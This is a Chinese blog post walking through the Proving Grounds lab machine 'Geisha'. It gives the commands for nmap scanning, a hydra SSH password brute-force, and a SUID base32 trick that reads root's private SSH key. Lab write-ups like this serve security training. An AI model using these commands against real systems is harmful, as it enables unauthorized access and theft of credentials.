PG::Geisha

最新推荐文章于 2025-07-29 20:47:12 发布
最新推荐文章于 2025-07-29 20:47:12 发布
阅读量207 收藏
点赞数
CC 4.0 BY-SA版权
分类专栏: PROVING GROUNDS 文章标签: 安全
版权声明:本文为博主原创文章,遵循 CC 4.0 BY-SA 版权协议,转载请附上原文出处链接和本声明。
本文链接:https://blog.youkuaiyun.com/weixin_46743202/article/details/128082118
本文详细记录了使用nmap进行端口探测,路径爆破获取passwd文件,通过geisha暴力破解SSH并成功登录。后续揭示了SUID权限提升和base32编码解码技巧。展现了渗透测试过程中的关键步骤和技术应用。

摘要生成于 C知道 ,由 DeepSeek-R1 满血版支持, 前往体验 >

nmap -Pn -p- -T4 --min-rate=1000 192.168.171.82
image.png
nmap -Pn -p 80,7080,7125,8088,9198 -sCV 192.168.171.82
image.png
查看80端口的页面
image.png
尝试路径爆破,在7125端口的/passwd目录下得到了备份文件
image.png
在其他方式尝试无果后,使用geisha爆破ssh服务
hydra -l geisha -P rockyou.txt 192.168.171.82 ssh -t 4

image.png
ssh成功登录
image.png
发现可以SUID提权
image.png
https://gtfobins.github.io/gtfobins/base32/#suid
/usr/bin/base32 /root/.ssh/id_rsa | /usr/bin/base32 --decode
image.png
image.png

geisha:一个使用qurakus框架的项目, 名字源于瑰夏咖啡
04-12
geisha project geisha(瑰夏)是一个使用了的快速开发项目, 创立的目的是想提供一个快速可用的Quarkus后台项目. 名字来源于瑰夏咖啡. 项目特点 响应式的 非阻塞的 模块划分 geisha-service : 服务模块, 服务模块只...
Geisha
10-25
"Geisha"这个主题,通常与日本艺妓文化相关,但在字体设计领域,它可能指的是一个特定的字体家族或者设计风格。让我们深入探讨一下与“Geisha”相关的字体设计知识。 首先,字体是任何设计项目的基础,它能够表达...
copyproperties爆红_一屋模玩怎样不能价值300万?分分钟用超.......
weixin_42366954的博客
12-24 1369
原标题:一屋模玩怎样不能价值300万?分分钟用超.......前几日famine看见朋友圈各位模友刷着5年贪污300万,只为买玩具!很多人说他一屋高达模型和手办,怎样买超300万分明是顶包的。 他说的是3万一个模型应该不是人民币。 而是日元 又有朋友问,玩“模玩”真能超过300万吗?答案是:“看你有没有300万买模玩咯!告诉你一个事实你给3百万我买模玩可能几分钟就花完了。问题是谁给3百万我花。可能...
Geisha1压缩包子技术解析与应用
由于提供的文件信息中【标题】、【描述】、【标签】均为"geisha1",且【压缩包子文件的文件名称列表】仅包含"geisha1-main",我们可以看出信息量非常有限。"geisha1"这个标题可能暗示该文件或项目与某种名为“geisha...
Geisha字体介绍与应用分析
资源摘要信息:"Geisha字体" Geisha在中文语境下,可以翻译为“艺伎”,它不仅仅指一种职业,还象征着日本传统文化和审美。在IT领域中,与之相关联的可能是与“Geisha”这一关键词相关的字体设计。字体在IT行业中是...
去中心化时代的通信革命:briefing与cpolar技术融合带来的安全范式革新
qq_62662919的博客
07-26 963
摘要:本文介绍如何在Linux Ubuntu系统使用Docker本地部署开源视频会议系统briefing,并通过cpolar内网穿透实现远程访问。briefing具有端到端加密、多因素认证等安全特性,支持高清视频通话和屏幕共享。Docker部署仅需一条命令即可完成,cpolar工具可创建公网地址实现异地访问。文章详细讲解了从Docker安装、briefing部署到cpolar配置的全过程,并提供了固定域名的方法,帮助用户无需公网IP即可搭建私有视频会议系统,兼顾安全性与便捷性。
安全漏洞】网络守门员:深入理解与应用iptables,守护Linux服务器安全
07-26 1179
Linux中iptables的深入理解与应用
【资讯】2025年软件行业发展趋势:AI驱动变革,云原生与安全成核心
weixin_56334307的博客
07-26 1033
2025年的软件行业正经历AI驱动的生产力革命,云原生与安全成为企业核心竞争力,低代码重塑IT人才结构,开源生态在争议中探索新商业模式。拥抱技术变革并建立敏捷响应机制的企业,将在这场数字化转型浪潮中占据先机。
智能Agent场景实战指南 Day 23 : Agent安全与隐私保护
最新发布
在未来等你的专栏
07-29 373
智能Agent处理的数据通常包含用户个人信息、商业机密等敏感内容。安全漏洞可能导致数据泄露、模型被攻击等严重后果。保护用户隐私数据不被泄露防止模型被恶意输入攻击(如Prompt Injection)确保API调用的认证和授权安全满足GDPR等合规要求智能Agent安全防护的四个关键层面:数据、模型、API、隐私防Prompt注入的多种技术组合差分隐私在数据收集中的应用医疗等敏感行业的特殊处理要求。
飞行控制领军者 | 边界智控携高安全级飞控系统亮相2025深圳eVTOL展
Spey_Events的博客
07-25 862
目前,边界智控在团队、产品、技术、业务及融资等各方面均实现了业内领先。2025 深圳eVTOL展的举办,为全球eVTOL产业链搭建了高规格、国际化的交流合作平台,全面多维地彰显了参展企业的卓越实力与行业引领地位,更为推动 eVTOL产业向高质量、规范化、规模化方向发展提供了有力支撑,对引领低空经济未来发展具有重要意义。作为eVTOL飞行控制领域的核心赋能者,边界科技将借此国际平台,全面展示其在核心技术领域的最新突破,与全球业界同仁深入交流前沿理念,共同探讨飞控系统对于推动eVTOL产业发展的核心驱动作用。
2025数字藏品安全保卫战:高防CDN如何成为NFT应用的“隐形护甲”?
2403_86962125的博客
07-29 634
2025年全球数字藏品市场突破$1000亿,但安全事件同步激增230%——某头部NFT平台因3.2Tbps DDoS攻击瘫痪,用户无法交易稀有藏品;:当藏品价值飙升时,攻击者早已举起屠刀——唯有前置防御,方能守护数字资产的价值根基!:某平台遭1.8Tbps UDP反射攻击,支付接口瘫痪3小时,用户资产无法转移。:某数字藏品平台接入后成功抵御800Gbps混合攻击,拍卖会0中断。:伪造海量API请求(如查询藏品详情),耗尽服务器连接池。:某平台未支持QUIC协议,海外用户加载延迟>5秒。
2025年SDK游戏盾终极解析:重新定义手游安全的“隐形护甲”
2403_86962125的博客
07-28 922
2025年全球手游市场规模突破$2000亿,黑客单次攻击成本却降至$30——某SLG游戏因协议层CC攻击单日流失37%玩家,某开放世界游戏遭低频DDoS瘫痪6小时损失千万。attackCheck: "RELAXED", // 宽松模式(高操作容忍):定位高频攻击IP段(如某棋牌游戏阻断越南IP后攻击↓90%):分析操作轨迹(如移动速度/技能冷却),识别外挂概率>92%:云端流量清洗,被动响应网络层攻击(如SYN Flood):客户端嵌入防护模块,主动拦截应用层威胁(外挂/协议篡改)
聚铭安全管家平台2.0实战解码 | 安服篇(三):配置保障 自动核查
juminfo的博客
07-29 325
SSH端口手动开启、防火墙规则被误删、关键配置遭篡改……人工操作难免疏漏;攻击者持续扫描探测,专门针对"加固后管理真空期"发起攻击。传统加固后依赖人工定期复查,成本高、周期长,漏洞暴露窗口期长达数周;等发现问题时,攻击者早已长驱直入,甚至潜伏数月……“加固不是一劳永逸,而是持续的战斗。”——但这场战斗,不应该靠人力硬扛!对此,聚铭安全管家平台2.0带来了全新解决方案。平台推出的「配置保障」功能,依托自动化核查机制,实现全流程智能监控,同时支持智能加固,确保安全状态始终在线、持续可靠!
ZeroNews 推出端到端 TLS 终止功能,强化数据传输安全
2501_91573548的博客
07-28 772
TLS 终止能力,本质上是将数据“保险箱”的钥匙(私钥)完全交由您自己保管,ZeroNews 则专注于安全地“护送”这个已上锁的保险箱(通过加密隧道传输数据)。
CGA围手术期:全周期保障老年手术安全
khrh_18600903089的博客
07-28 929
对术中出血量较多的患者,依据术前贫血风险评估结果,选择合适的输血方式,减少输血不良反应。其核心价值在于以评估数据为依据,让每个环节的安全措施都精准对接患者需求,既保障手术顺利实施,又推动患者安全回归生活,为老年手术患者构建起坚实的安全屏障。老年患者手术安全涉及术前风险防控、术中精准管理、术后功能恢复等多个环节,CGA围手术期以系统性评估为核心,构建覆盖手术全周期的安全保障体系,通过“风险预判-动态调控-康复护航”的闭环管理,最大限度降低手术不良事件发生率,让老年患者在安全框架内获得最佳治疗效果。
【隧道篇 / IPsec】(7.6) ❀ 01. 利用向导快速建立IPsec安全隧道 (点对点) ❀ FortiGate 防火墙
防火墙技术专栏
07-26 909
相信很多人已经习惯利用导向快速创建VPN了,而且已经有部分尝鲜者已经用上了FortiOS 7.6,但是会发现FortiOS 7.6下的VPN向导改变了很多,一时无法下手,下面我们来看看最常见的点对点是如何配置的。
浏览器安全演进:从裸指针到 raw_ptr 的实践与思考
John_ToStr的博客
07-28 650
【摘要】Chromium项目为应对内存安全问题引入raw_ptr<T>智能指针,有效缓解Use-After-Free漏洞。该指针通过引用计数(BackupRefPtr)或悬空检测机制,在保持传统指针语义的同时增加运行时安全校验。与base::WeakPtr相比,raw_ptr更适用于常规成员变量替换,而WeakPtr适合异步场景。实际应用中,Chromium团队通过自动化工具逐步替换裸指针,性能开销控制在1-2%范围内。建议优先使用raw_ptr管理成员变量,但避免在性能关键路径过度使用。该方案
多租户系统中的安全隔离机制设计
TechVision大咖圈聚合全球科技大咖,洞察AI、云计算、大数据等前沿趋势,为企业决策者提供智见未来的转型路径。
07-25 846
多租户系统是指在同一个应用实例中为多个客户(租户)提供服务的架构模式。就像一栋办公大楼可以同时容纳多家公司一样,一个软件系统可以同时服务多个客户。
评论
添加红包

请填写红包祝福语或标题

红包个数最小为10个

红包金额最低5元

当前余额3.43前往充值 >
需支付:10.00
成就一亿技术人!
领取后你会自动成为博主和红包主的粉丝 规则
hope_wisdom
发出的红包
实付
使用余额支付
点击重新获取
扫码支付
钱包余额 0

抵扣说明:

1.余额是钱包充值的虚拟货币,按照1:1的比例进行支付金额的抵扣。
2.余额无法直接购买下载,可以购买VIP、付费专栏及课程。

余额充值